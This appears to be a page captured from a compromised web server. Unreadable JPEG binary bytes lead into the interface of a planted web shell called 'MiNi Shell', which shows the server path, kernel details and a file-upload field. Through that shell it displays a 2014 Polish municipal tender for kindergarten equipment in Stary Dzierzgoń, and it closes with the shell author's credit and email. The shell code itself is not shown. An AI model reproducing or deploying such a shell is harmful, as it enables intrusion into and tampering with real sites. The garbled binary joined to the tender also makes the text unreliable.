JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140630/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140630/217734-N-2014.html

<p class="kh_header"><b>Stary Dzierzgoń: Modernizacja oddziałów przedszkolnych w Gminie Stary Dzierzgoń</b><br>
<b>Numer ogłoszenia: 217734 - 2014; data zamieszczenia: 30.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Stary Dzierzgoń , Stary Dzierzgoń, 82-450 Stary Dzierzgoń, woj. pomorskie, tel. (055) 2761481.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.starydzierzgon.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja oddziałów przedszkolnych w Gminie Stary Dzierzgoń.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest modernizacja oddziałów przedszkolnych w Gminie Stary Dzierzgoń
Zadanie nr 1 - organizacja placu zabaw poprzez zakup wyposażenia i jego montaż w Publicznej Szkole Podstawowej w Myślicach
1.	Huśtawka podwójna - 2 szt.
2.	Huśtawka równoważna - 2 szt.
3.	Sprężynowce- 4 szt. w tym w kształcie: 
a)	Konika
b)	Motorka
c)	Lwa
d)	Dinozaura
4.	Karuzela krzyżowa- 1 szt.
5.	Karuzela tarczowa z siedzeniami - 1 szt.
6.	Kółko i krzyżyk - 1 szt.
7.	Tablica do malowania - 1 szt.
8.	Ławka żeliwna - 7 szt.
9.	Zabawki wielofunkcyjne - 1 szt.

Zadanie nr 2 - Dostosowanie pomieszczeń w Publicznej Szkole Podstawowej w Myślicach poprzez zakup wyposażenia i montaż 
10. Umywalka z syfonem - 3 szt.
11. Miska ustępowa ze spłuczką - 3 szt.
12. Podest do toalet i umywalek - 4 szt.
13. Półka na kubeczki - 4 szt.
14. Lustro - 3 szt.
15. Podajnik na mydło - 5 szt. 
16. Podajnik na ręczniki papierowe - 3szt.
17. Umywalka z syfonem dla personelu - 1 szt.
18. Miska ustępowa ze spłuczką dla personelu - 1 szt.
19. Lustro dla personelu - 1 szt.
20. Podajnik na mydło dla personelu - 1 szt.
21. Podajnik na ręczniki papierowe dla personelu - 1 szt.
Zadanie nr 3 - Zakup sprzętu do utrzymania czystości oraz wyposażenia zaplecza kuchennego w  Publicznej Szkole Podstawowej w Myślicach
22. Odkurzacz - 1 szt.	
23. Pralka - 1 szt.
24. Szafa do przechowywania naczyń - 6 szt.
25. Blat roboczy - 2 szt.
26. Zlew z syfonem - 4 szt.
27. Umywalka do mycia rąk - - 2 szt.
28. Lodówka - 2 szt.
29. Zmywarka gastronomiczna z wyparzaczem - 1 szt.
30. Młynek do rozdrabiania resztek pożywienia - 1 szt.
31. Zestaw garnków i patelni
- garnek z pokrywką 18 litrów - 3 szt. 
- garnki z pokrywką 12 litrów - 2 szt. 
- garnek 20 litrowy  - 1 szt. 
- garnki 3 litrowe - 2 szt. 
- patelnia -  4 szt. 
32. Garnek z pokrywką - 48 l - 1 szt.
33. Łyżki wazowe - 5 szt.
34. Łyżki cedzakowe - 5 szt.
35.  Zestaw naczyń dla dzieci:
- talerze płytkie - 50 szt. 
- talerze głębokie  - 50 szt.  
- talerze deserowe - 50 szt. 
36. Zestaw sztućców dla dzieci:
- łyżki stołowe - 50 szt. 
- widelec - 50 szt. 
- nóż - 50 szt. 
- łyżeczka - 50 szt.
Zadanie nr 4 - Wyposażenia sal dydaktycznych w Publicznej Szkole Podstawowej w Myślicach
37. Stoły przedszkolne - 8 szt.
38. Krzesełka dziecięce - 48 szt.
39. Szafka ze schowkami - 4 szt.
40. Szafa zamykana - 4 szt.
41. Regał otwarty na zabawki - 6 szt.
42. Biurko dla nauczyciela - 2 szt.
43. Biblioteczka - 2 szt.
44. Wykładzina dywanowa - 2 szt.
45. Tablica biała ścieralna - 2 szt.
46. Zakup i montaż rolet okiennych - 2 komplety
47. Pufa - 4szt.
48. Poduszki okrągłe wykonane z tkaniny - 4 zestawy po 10 szt.
49. Stojak na poduchy - 4 szt.
50. Bujak kotek - 4 szt.
51. Bujak ślimak - 4 szt.
52. Pikowany samolot - 2 szt.
53. Materace 3 częściowe - 4 szt.
54. Piankowa ciuchcia - 2 szt.
55. Kostki świetlicowe - 1 szt.
56. Szafka na ubrania - 10 szt. 
Zadanie nr 5 - Zakup zabawek i pomocy dydaktycznych do Publicznej Szkoły Podstawowej w Myślicach
57. Zabawki i pomoce dydaktyczne;
1)	Klocki drewniane -  2 kpl.
2)	Samochód wywrotka -  4 szt.  
3)	Plansza/mata do zabawy samochodami ze schematami ulic - 2szt. 
4)	Lalka-dziecko zamykające oczy -  4 szt.
5)	Zestaw narzędzi do majsterkowania - 2 kpl. 
6)	Zestaw perkusyjny -  2 zestawy 
7)	Koń na biegunach - 2 szt. 
8)	Zestaw plansz do zabaw ruchomych - 4 kpl.
9)	Skakanka  - 40 szt.
10)	Piłka - 16 szt.
11)	Lalka -  12 szt.
12)	Łóżko drewniane - 2 szt. 
13)	Zestaw małego lekarza -  4 kpl.
14)	Łazik - 2 szt.
15)	Pojemnik na zabawki - 4 szt. 
16)	Kasa z kalkulatorem - 4 szt.
17)	Piłka skacząca  - 6 szt.
18)	Ringo  - 40 szt.
19)	Latający dysk - 30 szt.
20)	Tunel dla dzieci - 4 szt.
21)	Kolorowe woreczki do zajęć gimnastycznych i rehabilitacyjnych - 60 szt.
22)	Miś - 5 szt. 
23)	Taca z naczyniami - 2 kpl.
24)	Samochód strażacki 5 szt. 
25)	Betoniarka  - 6 szt.
26)	Koparka -  4 szt.
27)	Puzzle drewniane-  4 szt.
28)	Zestaw zabawek do piaskownicy- 5 kpl.
29)	Kuchenka (zabawka)-  2 szt. 
30)	Traktor Gigant -  2 szt. 
31)	Traktor gigant z przyczepą - 2 szt. 
32)	Ciężarówka z autami - 2 szt. 
33)	Tir z kontenerem - 2 szt.
34)	Lalka z akcesoriami do robienia fryzur - 4 szt.
35)	Lalka z wózkiem -  2 szt. 
36)	Wózek spacerowy - 4 szt. 
37)	Kołyska dla lalek -  2 szt.
38)	Drewniany domek sąsiadów - 2 szt. 
39)	Akcesoria kuchenne -  2 szt.
40)	Klocki - 2 szt. 
41)	Klocki wafle mix -  2 szt.
42) Bączki - 4 szt.
58. Dom do zabawy - 2 szt.
59. Zabawki:
1)	Gra planszowa Jaś i Małgosia, Czerwony Kapturek, Grzybobranie- 24 szt.
2)	Uczymy się słówek-książka z ćwiczeniami - 5 szt.
3)	Gra w skojarzenia -  5 szt.
4)	Ścienna mapa Polski - 2 szt. 
5)	Gra ćwicząca pamięć  dziecka - 4  szt.
6)	Unia europejska - 6 szt. 
7)	Plansze przyrodnicze - 4 szt.
8)	Gra do nauki recyklingu - 4  szt.
9)	Ekologiczne puzzle - 4 szt. 
10)	Liczby na magnesach - 40 szt.
11)	Magnetyczna linijka - 10  szt.
12)	Gry do ćwiczenia pamięci spostrzegawczości i refleksu - 10 szt.
13)	Słuchowisko z bajkami zestaw edukacyjny - 1szt.
 14)	 Piramida dźwięków - 6 szt. 
15)	 Gra kółko i krzyżyk - 6 szt. 
16)	 Gra poznajemy  kolory-  6 szt. 
17)	 Gra  leśny labirynt - 4 szt. 
18)	Puzzle 24 elementów -  4 szt. 
19)	 Duża klepsydra - 2 szt. 
20)	 Stoper klasowy - 2 szt. 
21)	 Duże pieczątki - cyfry, znaki (15 szt.) - 6 szt.
22)	Globus krajobrazowo - zoologiczny 220 mm. 2 szt.
23)	 Domino arytmetyczne dodawanie do 20 -  2 szt. 
24)	Domino arytmetyczne odejmowanie do 20 - 2 szt.
25)	Bezpieczne dziecko - plansze i karty pracy - 2 szt.
60.	Liczydło na stojaku -2 szt.
Zadanie nr 6 - Zakup artykułów plastycznych do Publicznej Szkoły Podstawowej w Myślicach
61. Artykuły plastyczne
1)	Taśma samoprzylepna - 60 szt.
2)	Klej przezroczysty-  80 szt.
3)	Klej uniwersalny -  80 szt. 
4)	Papier pakowy szary 80 G - 100 szt.  
5)	Markery zmywalne - 20 szt. 
6)	Plastelina - 60 szt. 
7)	Kredki 12 kolorów  - 80 szt.
8)	Farby  - 80 szt. 
9)	Zestaw pędzli do malowania  - 14 kpl. 
10)	Tektura falista różne kolory-  40 szt. 
11)	Brystol biały B1 -  100 szt. 
12)	Brystol różne kolory B1 - 100 szt. 
13)	Kolorowy papier A4 - 13 ryz 
14)	Bibuła karbowana różne kolory  - 206 szt. 
15)	Nożyczki przedszkolne -  60 szt. 
16)	Kredki świecowe (12 kolorów)- 50 szt. 
17)	Plastelina (12 kolorów) -50 szt. 
18)	Modelina (6 kolorów) -50 szt. 
19)	Papier do ksera  - 41 ryz
20)	Papier ozdobny A4 (w opakowaniu 25 arkuszy) - 2 op. 
21)	Papier ozdobny A4 (w opakowaniu 40 arkuszy) - 2 op. 
22)	Etykieta samoprzylepna biała A4 (100 szt. w opakowaniu) -  1 op. 
23)	Ołówek miękki HB-  50 szt.
24)	Markery do tablicy suchościeralnej (kpl. 4 szt.) -  6 kpl.
Zadanie nr 7 - Zakup sprzętu ICT do Publicznej Szkoły Podstawowej w Myślicach
62.	Laptop wraz z oprogramowaniem - 1 szt. 
63.	Urządzenie wielofunkcyjne - 1 szt.
64.	Rzutnik multimedialny - 1 szt.
65.	Ekran projekcyjny - 1 szt.
66.	Telewizor - 1 szt.
67.	Odtwarzacz DVD - 1 szt.
68.	Radio z odtwarzaczem - 2 szt.
69.	Tablica interaktywna - 1 szt.
70.	Oprogramowanie do tablicy interaktywnej - 3 szt.
71.	Aparat fotograficzny wraz z karta pamięci 16 GB - 1 szt.
72.	Statyw do aparatu fotograficznego - 1 szt.
73.	Kamera cyfrowa- 1 szt.
74.  Statyw do kamery cyfrowej - 1 szt.
Szczegółowy opis przedmiotu zamówienia zawarty został w: Załączniku nr 12 do SIWZ.
2.Dostawa nastąpi w godzinach od 8.00 do 13.00 do Publicznej Szkoły Podstawowej w Myślicach, Myślice 16.
3.Wykonawca udzieli Zamawiającemu 24 miesięcy gwarancji jakości i rękojmi za wady fizyczne każdego z elementów  przedmiotu umowy z wyłączeniem systemów i urządzeń objętych przedmiotem zamówienia, dla których gwarancji udziela producent - w przypadku systemów i urządzeń objętych przedmiotem zamówienia obowiązuje okres gwarancji zgodnie z warunkami gwarancji producenta, jednak nie krótszy niż 24 miesiące. Bieg terminu gwarancji jakości i rękojmi za wady rozpoczyna się od daty odbioru końcowego przedmiotu umowy, a w przypadku stwierdzenia wad, od ich usunięcia i przekazania Zamawiającemu przedmiotu umowy jako należycie wykonanego.
4.Strony umowy postanawiają, że odpowiedzialność wykonawcy z tytułu rękojmi zostanie rozszerzona przez udzielenie 36 miesięcy gwarancji za wady fizyczne każdego z elementów przedmiotu umowy, licząc od dnia odbioru końcowego całego przedmiotu umowy z wyjątkiem urządzeń, na które ich producenci udzielili dłuższego okresu gwarancji - według gwarancji producenta, z zastrzeżeniem maksymalnego okresu - w przypadku oferowania przez producenta opcjonalnych okresów gwarancji. 
5.Meble dydaktyczne - stoliki, krzesła przedszkolne powinny być wykonane zgodnie z normi. Wykonawca zobowiązany jest dostarczyć wymagane certyfikaty zgodności lub atesty bądź aprobaty wykonania z w/w w dniu protokolarnego przekazania przedmiotu umowy. Pozostałe wyposażenie powinno być wysokiej jakości i trwałości zgodne z wymogami: PN lub normami europejskimi, a także posiadać atest PZH, jeżeli posiadanie takich certyfikatów lub atestów będzie wymagane prawem.
6.Dostarczone produkty muszą być wniesione do pomieszczenia Zamawiającego.
7.Pomoce dydaktyczne, plastyczne, zabawki oraz meble powinny posiadać znak bezpieczeństwa i być dopuszczone do użytkowania w placówkach przedszkolnych.
8.Dostarczone przedmioty zamówienia muszą być fabrycznie nowe, wolne od wad, zapakowane w opakowania umożliwiające jednoznaczną identyfikacje produktu.
9.Zamawiający zastrzega sobie możliwość zwrotu dostarczonego asortymentu nie spełniającego wymogów jakościowych opisanych w SIWZ..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających stanowiących nie więcej niż 20 % wartości przedmiotu zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 37.50.00.00-3, 44.40.10.00-0, 39.71.00.00-2, 39.71.12.10-4, 39.71.31.00-4, 39.22.10.00-7, 39.70.00.00-9, 39.22.11.00-8, 39.22.11.10-1, 39.22.21.10-8, 39.22.11.80-2, 39.16.21.00-9, 37.82.00.00-2, 39.24.12.00-5, 32.32.00.00-2, 32.32.00.00-2, 32.33.00.00-5, 37.52.00.00-9, 39.16.10.00-8, 39.50.00.00-7, 39.31.40.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonywania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie oświadczenia  wykonawcy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie oświadczenia  wykonawcy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie oświadczenia  wykonawcy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie oświadczenia  wykonawcy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2.	Zamawiający dopuszcza zmianę treści umowy na pisemny wniosek każdej ze stron umowy, jeżeli wystąpi co najmniej jedna z niżej wymienionych okoliczności:
1) konieczność zmiany, w tym w zakresie wysokości wynagrodzenia, związana jest ze zmianą powszechnie obowiązujących przepisów prawa (np. w zakresie zmiany wysokości stawki podatku VAT);
2)zaistnienia zdarzeń niezależnych od stron, po dacie zawarcia Umowy, o charakterze działania siły wyższej, które umożliwiłyby terminowe wykonanie zobowiązań - strony zobowiązują się do wspólnego określenia nowego terminu realizacji przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://ug.starydzierzgon.samorzady.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Stary Dzierzgoń, Stary Dzierzgoń 71, 82-450 Stary Dzierzgoń, pokój nr 13.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.07.2014 godzina 10:00, miejsce: Urząd Gminy Stary Dzierzgoń, Stary Dzierzgoń 71, 82-450 Stary Dzierzgoń, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie realizowane jest w ramach projektu -Modernizacja oddziałów przedszkolnych w Gminie Stary Dzierzgoń- w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Priorytetu IX. Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.1 Zmniejszenie nierówności w stopniu upowszechniania edukacji przedszkolnej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com